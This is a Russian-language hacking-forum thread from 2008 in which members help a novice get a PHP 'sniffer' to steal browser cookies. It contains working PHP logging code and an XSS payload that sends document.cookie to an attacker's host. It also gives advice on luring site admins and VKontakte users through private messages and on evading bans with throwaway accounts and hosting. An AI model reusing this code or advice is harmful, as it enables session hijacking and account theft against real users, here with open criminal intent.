Снифер не крадет кукис.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Снифер не крадет кукис. - 2008-09-19 00:02:15.500000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Я решил тут первый раз попробовать php снифер….загрузил на хост…перешел на свой скрипт…затем посмотрел отчет. В отчете только IP мой высветился и все….ну я подумал что может че то у меня…дал ссылку другу….смотрю опять только его IP….. может кто то сталкивался с такой проблемой.
отчеты пришли такого вида
0.0.0.0_None_None_18:09:2008_15:11
Как я понял вместо None должны быть записи хэшей ???
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 00:10:48.736666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
код снифака выложи
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 02:20:22.240000
|
|
|
[CODE]
Сообщений: 637
Оценки: 0
Присоединился: 2008-08-18 04:20:44
|
Скорее всего со снифером трабла, пробуй другой…по-любому должен ип и рефер как минимум передаваться…
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 08:31:33.083333
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Вот код снифера
<?php
# Функции ---------------- #
function ch_symbol( $Str )
{
$Str = str_replace( "<","&lt;",$Str );
$Str = str_replace( ">","&gt;",$Str );
$Str = str_replace( "_","&#151;",$Str );
return $Str;
}
# ----------------------- #
# Обьявляем переменные -- #
$File = "log.txt";
$Name_Img = "1.gif";
$RZ = "_";
$Date = date( "d:m:Y" );
$Time = date( "H:i" );
$IP = trim( $_SERVER['REMOTE_ADDR'] );
$REF = trim( $_SERVER['HTTP_REFERER'] );
$QS = trim( $_SERVER['QUERY_STRING'] );
# ----------------------- #
# показываем картинку #
Header( "HTTP/1.0 200 OK" );
header( "Content-Type:image/gif" );
if ( file_exists( $Name_Img ) )
{
$Img = fopen( $Name_Img,"r" );
if ( $Img )
{
fpassthru($Img);
fclose($Img);
}
else exit( ":-)" );
}
else exit( ":-)" );
# ----------------------- #
# заменяем символы ------ #
if ( empty($IP) )
{
$IP = "None";
}
else
{
$IP = ch_symbol( $IP );
}
if ( empty($REF) )
{
$REF = "None";
}
else
{
$REF = ch_symbol( $REF );
}
if ( empty($QS) )
{
$QS = "None";
}
else
{
$QS = ch_symbol( $QS );
}
# ---------------------- #
# открываем файл лога в режиме чтения и заносим
# всё содержимое в буфер(переменную)
if ( file_exists($File) )
{
$Fpr = fopen( $File,"r" );
if ( $Fpr )
{
# блокируем файл и читаем собержимое #
flock( $Fpr,LOCK_SH );
$Bufer = fread( $Fpr,filesize($File) );
flock( $Fpr,LOCK_UN );
fclose( $Fpr );
# ---------------------------------- #
# открываем(создаём) файл и записываем информацию переданную скрипту
# и дописываем в конец предыдущую информацию, таким образом новая информация
# находиться всегда впереди(вверху)
$Fpw = fopen( $File,"w" );
if ( $Fpw )
{
for($i=0; $i<10; ++$i )
{
if ( flock($Fpw,LOCK_EX) ) break;
else sleep(1);
}
fwrite( $Fpw,$IP.$RZ.$REF.$RZ.$QS.$RZ.$Date.$RZ.$Time."\n");
fwrite( $Fpw,$Bufer );
flock( $Fpw,LOCK_UN );
fclose( $Fpw );
}
else exit( ":-)" );
}
else exit( ":-)" );
}
else exit( ":-)" );
# ------------------------------------------ #
?>
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 11:42:44.366666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
В общем неохота разбиратся, что там у тебя понаписано, но в упор не видно, где он у тебя там вообще куки забирает. Вот рабочий вариант, тренируйся без картинок пока, чтобы в суть врубиться:
сам snifer.php (заливаем на хост с поддержкой php):
<?php
$data=date("D.M.Y"); //в скобках прописан формат отображения даты D - день недели, M - месяц Y - год.
$time=date("h:i"); //в скобках прописан формат отображения времени h - часы, i - минуты
$ip=trim($_SERVER['REMOTE_ADDR']);
$sysinfo=trim($_SERVER['HTTP_USER_AGENT']);
// это стандартные переменные, которые автоматом принимает сервер
$query=trim($HTTP_GET_VARS['cook']); // а тут мы печенки тырим
$file = 'log.txt';
if(is_file($file)){ //Проверяем наличие файла и возможность работы с ним
$fo=fopen($file,"a"); //Открываем файл на запись в конец
$res="$data | $time | $ip | $sysinfo \n $query \n"; //Формируем строку с информацией от жертвы
//в формате дата|время|ip-адрес|характеристика системы+COOKIE с новой строки
$fw=fwrite($fo,$res); //Записываем в файл
fclose($fo); //Закрываем файл
}
?>
<sсriрt>history.go(-1)</sсriрt>
Временно не работает
потом, чтобы проверить работу, вставляем например на свой сайт на народ.ру на любую страничку следующий код:
<sсriрt>window.location.href='http://путь до твоего снифака/snifer.php?cook='+document.cookie;</sсriрt>
вот в принципе и всё. Открываешь эту страничку на народ.ру и потом идешь проверять log.txt
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 20:33:57.990000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Ты просто ему сцыль на снифак дал и ждёшь что все его куки тебе приплывут?)
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 20:35:33.430000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
))) нет, я ему дал рабочий вариант, правда если он догадается, что форум фильтрует кое-что
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 20:38:54.366666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Pashkela
))) нет, я ему дал рабочий вариант, правда если он догадается, что форум фильтрует кое-что
Я не тебе,я сужу из его действий = он зашёл тупо на свой сниф то влоге отобразиться токо ip и reff,а если с чистой страницы то и реффёрера не буит
вот и всё
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 22:53:32.060000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
а как надо заходить?????
кстати вот твой снифер попробовал и вот что получил…..
Fri.Sep.2008 | 04:29 | тут IP | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Fri.Sep.2008 | 10:10 | Тут IP | Opera/9.24 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 23:04:54.596666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
в гугл курить мануал по xss
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 23:13:42.630000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Понял не дурак…..типа www.site.ru/уязвимая_переменная=<sсriрt>window.location.href='http://путь до твоего снифака/snifer.php?cook='+document.cookie;</sсriрt>
Если не прав то поправь меня…..
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 23:17:12.773333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: Jarull
Понял не дурак…..типа www.site.ru/уязвимая_переменная=<sсriрt>window.location.href='http://путь до твоего снифака/snifer.php?cook='+document.cookie;</sсriрt>
Если не прав то поправь меня…..
Конструкция получения куков можит быть разной (прим:<script scr="blablabla.js"></script>)
Прочитай про активные xss, в твоём примере это пассивка
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-19 23:22:25.290000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Ну значит мы можем сказать что такой php снифер это не 100% атака на пользователя…то есть надо найти уязвимое место в сайте и дать ему ссылку….а если переменные фильтруются то значит ничего не выйдет……
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:05:35.043333
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
А что если сделать свой сайт заведомо с уязвимостью и сделать ссылку со снифером……будет работать????
Например www.mysite.ru/first.php?id=<sсriрt scr="http://www.myhosting.js"></sсriрt>
Если будет работать то на какой движок лучше поставить для таких целей сайт…чтобы с уязвимостью заведомо было….
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:10:13.263333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
Если будет работать то на какой движок лучше поставить для таких целей сайт…чтобы с уязвимостью заведомо было….
)))) Ппц
Еще раз - самое простое - просто залить снифер на свой сайт (без всяких там уязвимостей) и просто выложить ссылку на него в форуме, откуда ты хочешь, чтобы зашел человек и поиметь его кукисы (с этого форума). А картинка и прочее - лишь одно из средств маскировки твоих истинных намерений
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:13:32.186666
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Все ясно теперь….ну просто загнали мне про xxs……а если я например на этом форуме ему в личку напишу???? или например сообщение на стене в контакте и опять же в личку в контакте????
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:18:13.376666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Сработает только при условии, что XSS-уязвимость присутствует в этом движке при написании тех же личных сообщений, например. Ес-но, не каждый админ и модер будет тыкать все ссылки подряд, чтобы отдать тебе свои куки. Ты же говоришь о том, что он ПРОСТО ПРОЧИТАЕТ твое личное сообщение. А это уже серьезная уязвимость, которые надо искать самостоятельно или на баг-траках соответствующих
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:36:05.480000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
ну например по личной почте Вконтакте я пересылаю юзеру ссылку на снифер….юзер переходит и его кукис от контакта у меня???
Я расчитываю на то что админ например какого то сайта именно ткнет на ссылку….
|
|
|
|
|
RE: Снифер не крадет кукис. - 2008-09-21 22:39:47.730000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Если тыкнет - то да. Как простейший вариант. Но потом, когда до него дойдет, могут быть негативные последствия. Если уж идти этим путем, то более правильно было бы зарегить левый акк и общаться через него, ибо вероятность немедленного бана более 99% (как и вероятность смены палевного хоста). Т.е. если на тебя официально пожалуются - гуд бай хостер. Скорее всего
|
|
|
|
|
|
